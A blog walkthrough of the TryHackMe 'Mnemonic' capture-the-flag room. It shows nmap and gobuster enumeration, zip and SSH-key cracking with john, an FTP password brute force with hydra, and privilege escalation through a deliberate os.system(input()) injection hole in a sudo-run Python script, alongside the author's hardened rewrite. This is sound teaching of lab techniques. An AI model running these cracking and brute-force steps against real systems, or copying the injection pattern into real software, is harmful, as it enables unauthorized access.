narancs's blog

TryHackMe – Mnemonic walkthrough

TryHackMe Mnemonic CTF room logo

Introduction

Mnemonic is a medium-difficulty room on TryHackMe that covers several different techniques. During the room we need to crack the passwords of a zip file and of an SSH private key, brute-force the FTP password, and find a vulnerability in a short Python script.

Task 1 - Mnemonic

The first task has no questions to answer. It only shows the following text together with a YouTube link:

    Hit me!

    You need 1 things : hurry up

    https://www.youtube.com/watch?v=pBSR3DyobIY

At first this did not seem useful: the text does not help much, and the link points to a YouTube video that is private and cannot be accessed.

However, I was able to find the video on the Wayback Machine website using a snapshot that was taken on Oct 29th, 2020. It is a short clip from the movie “Johnny Mnemonic”. It was posted by Matteo Bonanno on Dec 16, 2015, and the title of the video is “JOHNNY MNEMONIC | Hit me!”.

I also searched Google for the URL of the video and found a GitHub repository: https://github.com/MustafaTanguner/Mnemonic

The URL is in the README file of the repo.

Task 2 - Enumerate

How many ports are open?

I scanned all ports on the target with nmap.

    nmap -p- 10.10.28.195

3 ports were open: 21, 80 and 1337.

What is the ssh port number?

I ran nmap again with the -A flag to perform version detection and script scanning.

From the scan results we can see that the following services were running on the target:

  • FTP on port 21
  • HTTP on port 80
  • SSH on port 1337

The scan also shows that robots.txt contains a disallowed entry: /webmasters/*

What is the name of the secret file?

At this point I did not have any possible usernames or passwords for FTP or SSH, so I started enumerating the web server. I ran directory discovery on /webmasters/ first.

    gobuster dir --url http://10.10.28.195/webmasters -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 32

Two sub-directories were found:

  • /admin
  • /backups

Since the question asks for ‘the name of the secret file’, I started enumerating common file extensions (txt, log, sql, bkp, bak, zip, tar, tgz). Eventually I found the file in /webmasters/backups with a .zip extension.

    gobuster dir --url http://10.10.28.195/webmasters/backups -w /usr/share/wordlists/dirb/common.txt -x zip -t 32

Task 3 - Credentials

What is the ftp username?

I downloaded the file to unzip it, but it was password protected. So I used zip2john to generate a hash of the file and cracked the password with john.

    zip2john ***HIDDEN***.zip > zip.hash
    john -w=/usr/share/wordlists/rockyou.txt zip.hash

I unzipped the file, and there was a note inside that revealed the FTP username.

    @vill
    James new ftp username: ***HIDDEN***
    we have to work hard

What is the ftp password?

To get the password, I used hydra to brute-force it.

    hydra -l ***HIDDEN*** -P /usr/share/wordlists/rockyou.txt 10.10.136.218 ftp -t 32

What is the ssh username?

I logged in to the FTP server with the found credentials and checked the available files/directories.

Since there were a lot of directories on the FTP server, I downloaded everything recursively with wget so that I could check them more quickly.

    wget -r --user="***USERNAME***" --password="***PASSWORD***" ftp://10.10.136.218/

Only one of the directories contained files; the rest were completely empty. The data-4 directory had 2 files in it:

  • not.txt
  • id_rsa

The SSH username was in the text file.

What is the ssh password?

I tried to connect to the SSH server using the id_rsa file and the username from the text file. First, the permissions on the id_rsa key file have to be changed to 600, otherwise ssh refuses to use a key that is readable by other users.

    chmod 600 id_rsa
    ssh -i id_rsa ***HIDDEN***@10.10.136.218 -p 1337

The SSH key had a passphrase. I used ssh2john to generate a hash of id_rsa, then cracked the passphrase with john.

    python3 ssh2john.py id_rsa > id_rsa.hash
    john -w=/usr/share/wordlists/rockyou.txt id_rsa.hash

I tried logging in again and the passphrase was accepted for the SSH key. Then the user's password was required as well; it was the same as the SSH key passphrase.

What is the condor password?

After login, root sent a broadcast message saying “Unauthorized access was detected.” A few minutes later a new message followed, “System Blocking is starting …”, then a 10-second countdown started, and when it reached 0 the server closed the connection. Logging in again was still possible, however.

In the home directory of the user I found 2 text files:

  • 6450.txt
  • noteforjames.txt

The note contained the following message:

    noteforjames.txt
    @vill
    james i found a new encryption İmage based name is Mnemonic
    I created the condor password. don't forget the beers on saturday

The other file looked like an encrypted message generated with the Mnemonic Cryptography tool that I discovered in task 1. However, to decrypt the message I would need the same image that was used for the encryption.

I checked which other users have home directories on the server.

    james@mnemonic:~$ ls -l /home
    total 32
    drwx------  2 root    root    4096 Jul 14  2020 alex
    drwxr--r--  6 condor  condor  4096 Jul 14  2020 condor
    drwx------ 12 ftpuser ftpuser 4096 Jul 14  2020 ftpuser
    drwx------  6 james   james   4096 Jul 14  2020 james
    drwx------  2 root    root    4096 Jul 14  2020 jeff
    drwx------  2 root    root    4096 Jul 14  2020 john
    drwx------  2 root    root    4096 Jul 14  2020 mike
    drwx------  4 vill    vill    4096 Jul 14  2020 vill
    james@mnemonic:~$

condor was mentioned in the note I found, and its home directory is the only one that grants read access to other users (drwxr--r--). So I listed the files in that directory and found an interesting result:

    james@mnemonic:~$ ls -l /home/condor
    ls: cannot access '/home/condor/'\''VEhNe2E1ZjgyYT***HIDDEN***NTViZTcxYzAxfQ=='\''': Permission denied
    ls: cannot access '/home/condor/aHR0cHM6Ly9pLnl0aW***HIDDEN*hyZXNkZWZhdWx0LmpwZw==': Permission denied
    total 0
    d????????? ? ? ? ?            ? 'aHR0cHM6Ly9pLnl0aW***HIDDEN*hyZXNkZWZhdWx0LmpwZw=='
    d????????? ? ? ? ?            ? ''\''VEhNe2E1ZjgyYT***HIDDEN***NTViZTcxYzAxfQ=='\'''
    james@mnemonic:~$

Two directories appeared in the list. The question marks are there because the directory grants read but not execute permission to others, so the entry names can be listed but the entries themselves cannot be stat-ed. The names of those directories were base64-encoded text.

The first encoded text was:

    aHR0cHM6Ly9pLnl0aW***HIDDEN*hyZXNkZWZhdWx0LmpwZw==

Decoded, it was the URL of the image required to decrypt the ciphertext generated by the Mnemonic Cryptography tool. I saved the image locally to use it for the decryption.

The other encoded text:

    VEhNe2E1ZjgyYT***HIDDEN***NTViZTcxYzAxfQ==

This was the user flag in base64-encoded form, which is the answer to the first question in task 4.
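As an added example (my own helper, not part of the original walkthrough or of the Mnemonic repository), a small Python script that pulls base64-looking tokens out of an ls listing like the one above and decodes the ones that turn into printable text. The listing is constructed with placeholder names (an example.invalid URL and THM{placeholder}); the room's real directory names are not reproduced. The second entry is written the way GNU ls quotes a name that itself contains single quotes, which is why the '\'' sequences appear.

```python
import base64
import binascii
import re

# Constructed `ls -l` output in the style of the listing above. Both
# directory names are placeholder base64 strings, not the room's real ones:
# one decodes to a URL, the other to a fake flag.
SAMPLE_LISTING = """total 0
d????????? ? ? ? ?            ? 'aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvaW1hZ2UuanBn'
d????????? ? ? ? ?            ? ''\\''VEhNe3BsYWNlaG9sZGVyfQ=='\\'''
drwxr-xr-x  2 root   root   4096 Jul 13  2020 notes
"""

# Candidate tokens: a long run of base64 alphabet with optional padding.
# The length threshold keeps short words such as "total" or "notes" out.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def try_decode(token: str):
    """Return the decoded text if `token` is valid base64 for printable UTF-8, else None."""
    # Restore padding in case the quoting swallowed the trailing '=' characters.
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not text or not text.isprintable():
        return None
    return text


def find_encoded_names(listing: str) -> dict:
    """Map every base64-looking token in an `ls` listing to its decoded text."""
    found = {}
    for line in listing.splitlines():
        for token in B64_TOKEN.findall(line):
            decoded = try_decode(token)
            if decoded is not None:
                found[token] = decoded
    return found


def classify(decoded: str) -> str:
    """Rough label for what a decoded name looks like: url, flag or plain text."""
    if decoded.startswith(("http://", "https://")):
        return "url"
    if re.fullmatch(r"THM\{[^}]*\}", decoded):
        return "flag"
    return "text"


if __name__ == "__main__":
    for token, text in find_encoded_names(SAMPLE_LISTING).items():
        print(f"{classify(text):4s}  {token}  ->  {text}")
```

Decoding with validate=True rejects anything outside the base64 alphabet, and the printable check filters out the random-looking binary that short tokens of ordinary text occasionally decode to, so the script can be run over a whole recursive listing without drowning in false positives.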

Using the Mnemonic Cryptography tool

To find the condor password, I used the Mnemonic tool from the GitHub repository. It requires two Python modules to be installed; after that I was able to run the code:

    pip3 install colored
    pip3 install opencv-python
    python3 Mnemonic.py

First, it asks for the path of the image that is used for encoding/decoding (Access Code image file Path). I provided the path to the image that I saved earlier.

Then I selected the second option: DECRYPT.

Finally, it asked for the path of the file that contains the encrypted text. I copied the text from the 6450.txt file on the target machine, pasted it into a file on my machine, and provided the path of that file.

The decrypted text is the password of the condor user, which is the answer to the last question in task 3.

Task 4 - Hack the machine

user.txt

I was able to log in as the condor user via SSH using the password found in the previous task. In condor's home directory, one of the directory names is the user flag in base64-encoded form, which I had already found in task 3.

    drwxr-xr-x  2 root   root   4096 Jul 13  2020 ''\''VEhNe2E1ZjgyYT***HIDDEN***NTViZTcxYzAxfQ=='\'''

root.txt

I checked the sudo privileges of the condor user and found that he is allowed to execute a Python script as root.

    condor@mnemonic:~$ sudo -l
    [sudo] password for condor:
    Matching Defaults entries for condor on mnemonic:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    User condor may run the following commands on mnemonic:
        (ALL : ALL) /usr/bin/python3 /bin/examplecode.py
    condor@mnemonic:~$

The file was writable only by root, so I checked the code for issues that could be exploited.

The code:

    #!/usr/bin/python3
    import os
    import time
    import sys
    def text(): #text print

            print("""
            ------------information systems script beta--------
            ---------------------------------------------------
            ---------------------------------------------------
            ---------------------------------------------------
            ---------------------------------------------------
            ---------------------------------------------------
            ---------------------------------------------------
            ----------------@author villwocki------------------""")
            time.sleep(2)
            print("\nRunning...")
            time.sleep(2)
            os.system(command="clear")
            main()

    def main():
            info()
            while True:
                    select = int(input("\nSelect:"))
                    if select == 1:
                            time.sleep(1)
                            print("\nRunning")
                            time.sleep(1)
                            x = os.system(command="ip a")
                            print("Main Menü press '0' ")
                            print(x)
                    if select == 2:
                            time.sleep(1)
                            print("\nRunning")
                            time.sleep(1)
                            x = os.system(command="ifconfig")
                            print(x)
                    if select == 3:
                            time.sleep(1)
                            print("\nRunning")
                            time.sleep(1)
                            x = os.system(command="ip route show")
                            print(x)
                    if select == 4:
                            time.sleep(1)
                            print("\nRunning")
                            time.sleep(1)
                            x = os.system(command="cat /etc/os-release")
                            print(x)
                    if select == 0:
                            time.sleep(1)
                            ex = str(input("are you sure you want to quit ? yes : "))
                            if ex == ".":
                                    print(os.system(input("\nRunning....")))
                            if ex == "yes " or "y":
                                    sys.exit()

                    if select == 5:                     #root
                            time.sleep(1)
                            print("\nRunning")
                            time.sleep(2)
                            print(".......")
                            time.sleep(2)
                            print("System rebooting....")
                            time.sleep(2)
                            x = os.system(command="shutdown now")
                            print(x)
                    if select == 6:
                            time.sleep(1)
                            print("\nRunning")
                            time.sleep(1)
                            x = os.system(command="date")
                            print(x)

                    if select == 7:
                            time.sleep(1)
                            print("\nRunning")
                            time.sleep(1)
                            x = os.system(command="rm -r /tmp/*")
                            print(x)

    def info():                         #info print function
            print("""
            #Network Connections   [1]
            #Show İfconfig         [2]
            #Show ip route         [3]
            #Show Os-release       [4]
            #Root Shell Spawn      [5]
            #Print date            [6]
            #Exit                  [0]
            """)
    def run(): # run function
            text()
    run()

I found that if I select option 0 (Exit), the code takes another input, asking “are you sure you want to quit ? yes : ”. If the answer to this question is a single . (dot), the following line is executed:

    print(os.system(input("\nRunning....")))

The program takes yet another user input, executes it as a shell command and prints the result. Since the script is started via sudo, the command typed here runs as the root user. I just typed bash and received a root shell.
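As an added example (my own code, not the room's script and not from the Mnemonic repository), here is the hardened counterpart of the menu above in Python. The command set is a fixed allowlist executed through subprocess without a shell, the quit confirmation is an exact match with no hidden branch, and the original `ex == "yes " or "y"` test is reproduced next to its fix, because that expression is always true: when the comparison is False, `or "y"` evaluates to the non-empty string "y". The function names and menu contents are my own choices, and the destructive options (shutdown, rm -r /tmp/*) are deliberately left out.

```python
import subprocess

# Fixed menu: choice -> argv list. No shell is involved and the argument
# vector is never built from user input, so nothing the operator types can
# reach a command line. Options mirror the non-destructive ones above.
MENU = {
    1: ["ip", "a"],
    2: ["ifconfig"],
    3: ["ip", "route", "show"],
    4: ["cat", "/etc/os-release"],
    6: ["date"],
}


def parse_choice(raw: str):
    """Return a valid menu number (or 0 for exit), else None.

    The original calls int(input(...)) unguarded, which raises ValueError on
    anything non-numeric and aborts the script."""
    raw = raw.strip()
    if not raw.isdigit():
        return None
    choice = int(raw)
    return choice if choice in MENU or choice == 0 else None


def build_command(choice: int):
    """Return the argv for an allowlisted choice, or None if it is not allowed."""
    return list(MENU[choice]) if choice in MENU else None


def run_choice(choice: int) -> int:
    """Execute an allowlisted command without a shell; refuse anything else."""
    argv = build_command(choice)
    if argv is None:
        raise ValueError(f"choice {choice} is not allowed")
    return subprocess.run(argv, check=False).returncode


def buggy_confirm(answer: str) -> bool:
    """Faithful copy of the original condition, kept only to show the defect:
    `answer == "yes " or "y"` is truthy for every possible answer."""
    return bool(answer == "yes " or "y")


def confirm_quit(answer: str) -> bool:
    """Exact-match confirmation; there is no '.' branch and no os.system(input())."""
    return answer.strip().lower() in {"yes", "y"}


def main():
    """Interactive loop; only reachable when run directly, not on import."""
    while True:
        choice = parse_choice(input("\nSelect: "))
        if choice is None:
            print("invalid choice")
            continue
        if choice == 0:
            if confirm_quit(input("are you sure you want to quit? yes: ")):
                return
            continue
        run_choice(choice)


if __name__ == "__main__":
    main()
```

When a script is granted through sudoers, every input path in it is a privilege boundary: keeping the argv lists fixed and never handing user input to os.system is the whole mitigation, and a sudo rule for such a script deserves the same review as a setuid binary.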

The root.txt file was in /root. It contained text that looked like the root flag, but it was not accepted.

    THM{co***HIDDEN***me}

To get the actual flag, we need the MD5 hash of the text between the curly brackets. Note the -n flag on echo: without it the trailing newline would be hashed too and the digest would be different.

    root@mnemonic:~# echo -n "co***HIDDEN***me" | md5sum
    2a48***HIDDEN***b0586  -
    root@mnemonic:~#

Then put the hash back between the curly brackets.

    THM{2a48***HIDDEN***b0586}
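The same transformation as an added Python example (my own helper, not part of the walkthrough), with THM{abc} as a constructed placeholder for the hidden text. It also shows why the -n flag matters above: hashing the text with a trailing newline gives a different digest.

```python
import hashlib
import re

# Matches the THM{...} wrapper and captures the text inside the braces.
FLAG_RE = re.compile(r"^THM\{(.*)\}$")


def md5_hex(text: str) -> str:
    """Hex MD5 of the UTF-8 bytes of `text`, exactly what `echo -n ... | md5sum` prints."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def finalize_flag(raw_flag: str) -> str:
    """Replace the text between the braces with its MD5 digest.

    The input is stripped first, so a value read with `cat root.txt` (which
    ends in a newline) hashes the same as one typed by hand."""
    match = FLAG_RE.match(raw_flag.strip())
    if not match:
        raise ValueError("input does not look like THM{...}")
    return "THM{" + md5_hex(match.group(1)) + "}"


if __name__ == "__main__":
    # Constructed placeholder; the room's real text is hidden above.
    print(finalize_flag("THM{abc}"))
    print("with newline:", md5_hex("abc\n"))
    print("without     :", md5_hex("abc"))
```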

Summary

It was fun to play the Mnemonic room on TryHackMe. Many skills were required to root the machine, but none of the steps was too complicated. I spent most of the time searching for “the secret file”, because I tried many wrong file extensions before checking for .zip files.

After getting the zip file, it was easy to crack its password and unzip it. I found the FTP username in the unzipped note. Then I used hydra to brute-force the password, which was quick because the password was simple.

Among the files on the FTP server I found a note that revealed the SSH username, and an SSH key for that user as well. The SSH key was also passphrase protected, so I cracked it with john. Then I was able to log in to the target via SSH.

I found more files on the target containing useful information. One file contained an encrypted message created by the Mnemonic Cryptography tool. I also found the URL of the image that was used for the encryption, so I was able to decrypt the message. The result was the SSH password of another user.

Then I logged in as the new user and checked the user's sudo privileges. The user had permission to execute a Python script as root, and the script had a vulnerability that allowed me to execute any command as root. I used that vulnerability to gain root access.
